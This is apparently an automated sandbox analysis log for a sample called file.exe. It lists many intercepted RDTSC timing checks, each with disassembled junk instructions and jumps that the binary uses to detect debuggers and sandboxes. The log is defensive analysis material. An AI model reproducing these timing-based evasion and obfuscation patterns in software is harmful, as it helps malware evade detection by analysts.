                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A133A second address: 6A1340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1340 second address: 6A134A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7704DD53A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A62A3 second address: 6A62C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F7704E143C8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8560 second address: 6A8578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A8578 second address: 6A857E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B0FC6 second address: 6B0FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B0FCA second address: 6B0FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B0FD2 second address: 6B0FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7704DD53AAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2CB5 second address: 6B2CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2CB9 second address: 6B2CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2CC1 second address: 6B2CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B2CC6 second address: 6B2CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5C05 second address: 6B5C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5C0B second address: 6B5C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5C12 second address: 6B5C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5684 second address: 6B5688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5688 second address: 6B569A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F7704E143BCh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB5B0 second address: 6BB5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB5B6 second address: 6BB5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7704E143B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C458B second address: 6C4593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C4593 second address: 6C4597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3198 second address: 5E319E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E319E second address: 5E31AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 je 00007F7704E143B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB508 second address: 6CB50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB50C second address: 6CB515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBBED second address: 6CBBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBBF3 second address: 6CBC08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BAh 0x00000007 pushad 0x00000008 jnl 00007F7704E143B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBC08 second address: 6CBC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBD2B second address: 6CBD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7704E143C2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBD43 second address: 6CBD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7704DD53B0h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBD5E second address: 6CBD62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CBE84 second address: 6CBE96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7704DD53ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0918 second address: 6D092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F7704E143C0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D092E second address: 6D0938 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7704DD53A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0AA0 second address: 6D0AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0AA6 second address: 6D0AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D0AAA second address: 6D0AB4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DCA7C second address: 6DCA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DF1AC second address: 6DF1B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E23F5 second address: 6E2417 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7704DD53B2h 0x00000008 je 00007F7704DD53B2h 0x0000000e je 00007F7704DD53A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2417 second address: 6E243C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jng 00007F7704E143B6h 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F7704E143B6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F7704E143B6h 0x0000001f jnp 00007F7704E143B6h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E243C second address: 6E2442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2442 second address: 6E245D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7704E143C2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2270 second address: 6E2276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4733 second address: 6E4737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4737 second address: 6E473D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E473D second address: 6E4747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4747 second address: 6E4755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4755 second address: 6E47A2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7704E143B6h 0x00000008 jmp 00007F7704E143C3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jno 00007F7704E143BCh 0x00000017 jl 00007F7704E143CFh 0x0000001d jmp 00007F7704E143C3h 0x00000022 jc 00007F7704E143B6h 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B4C second address: 6F0B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7704DD53B1h 0x0000000c jne 00007F7704DD53A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B6A second address: 6F0B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B6E second address: 6F0B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B74 second address: 6F0B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B81 second address: 6F0B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B85 second address: 6F0B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B9C second address: 6F0BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F99FE second address: 6F9A14 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7704E143BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9A14 second address: 6F9A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9A1A second address: 6F9A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7704E143C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9A36 second address: 6F9A3E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA3E6 second address: 6FA3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA6F2 second address: 6FA705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F7704DD53A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA705 second address: 6FA70B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA70B second address: 6FA710 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA888 second address: 6FA8A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7704E143C5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF32F second address: 6FF356 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7704DD53ACh 0x00000008 jne 00007F7704DD53A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jnc 00007F7704DD53ACh 0x00000018 pushad 0x00000019 jo 00007F7704DD53A6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF474 second address: 6FF49D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7704E143BFh 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF49D second address: 6FF4AF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7704DD53A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF4AF second address: 6FF4BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F7704E143B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF4BD second address: 6FF4C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF4C1 second address: 6FF4C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF4C5 second address: 6FF4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7704DD53B2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701190 second address: 7011AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7011AD second address: 7011BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7704DD53ACh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01B10 second address: 4A01B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01B25 second address: 4A01B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01B2B second address: 4A01B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01B2F second address: 4A01B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0C1E second address: 49A0C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 mov si, 713Bh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0633 second address: 49D0637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0637 second address: 49D063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D063B second address: 49D0641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A018F5 second address: 4A018F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A018F9 second address: 4A018FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A018FD second address: 4A01903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01903 second address: 4A0196F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7704DD53AEh 0x00000011 jmp 00007F7704DD53B5h 0x00000016 popfd 0x00000017 movzx esi, bx 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007F7704DD53B3h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F7704DD53B5h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499088F second address: 4990894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990894 second address: 49908E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7704DD53B8h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F7704DD53B0h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7704DD53B7h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49908E2 second address: 499092F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c jmp 00007F7704E143BEh 0x00000011 sub eax, eax 0x00000013 pushad 0x00000014 push edi 0x00000015 call 00007F7704E143BAh 0x0000001a pop eax 0x0000001b pop edx 0x0000001c push eax 0x0000001d pop esi 0x0000001e popad 0x0000001f inc eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ecx, 156F26A1h 0x00000028 mov edx, esi 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F8F second address: 4A00F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F95 second address: 4A0109B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushad 0x0000000e mov bh, ch 0x00000010 pushfd 0x00000011 jmp 00007F7704E143C7h 0x00000016 add cx, 419Eh 0x0000001b jmp 00007F7704E143C9h 0x00000020 popfd 0x00000021 popad 0x00000022 pushfd 0x00000023 jmp 00007F7704E143C0h 0x00000028 xor si, 1B98h 0x0000002d jmp 00007F7704E143BBh 0x00000032 popfd 0x00000033 popad 0x00000034 push eax 0x00000035 jmp 00007F7704E143C9h 0x0000003a nop 0x0000003b jmp 00007F7704E143BEh 0x00000040 lea eax, dword ptr [ebp-18h] 0x00000043 jmp 00007F7704E143C0h 0x00000048 nop 0x00000049 jmp 00007F7704E143C0h 0x0000004e push eax 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F7704E143C1h 0x00000056 adc cx, CBF6h 0x0000005b jmp 00007F7704E143C1h 0x00000060 popfd 0x00000061 popad 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F7704E143C9h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0109B second address: 4A010A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010A1 second address: 4A010A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010DB second address: 4A010FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 77A2h 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test edi, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7704DD53B1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A010FD second address: 4A011CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704E143C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7775212953h 0x0000000f jmp 00007F7704E143BEh 0x00000014 mov eax, dword ptr [ebp-14h] 0x00000017 pushad 0x00000018 mov bx, si 0x0000001b mov di, ax 0x0000001e popad 0x0000001f mov ecx, esi 0x00000021 jmp 00007F7704E143C4h 0x00000026 mov dword ptr [esi+0Ch], eax 0x00000029 pushad 0x0000002a call 00007F7704E143BEh 0x0000002f mov dx, si 0x00000032 pop ecx 0x00000033 call 00007F7704E143C7h 0x00000038 pushfd 0x00000039 jmp 00007F7704E143C8h 0x0000003e adc si, BDB8h 0x00000043 jmp 00007F7704E143BBh 0x00000048 popfd 0x00000049 pop esi 0x0000004a popad 0x0000004b mov edx, 74E806ECh 0x00000050 jmp 00007F7704E143BFh 0x00000055 sub eax, eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007F7704E143C0h 0x0000005f pushad 0x00000060 popad 0x00000061 popad 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A011CC second address: 4A011F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7704DD53B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7704DD53ADh 0x00000014 rdtsc
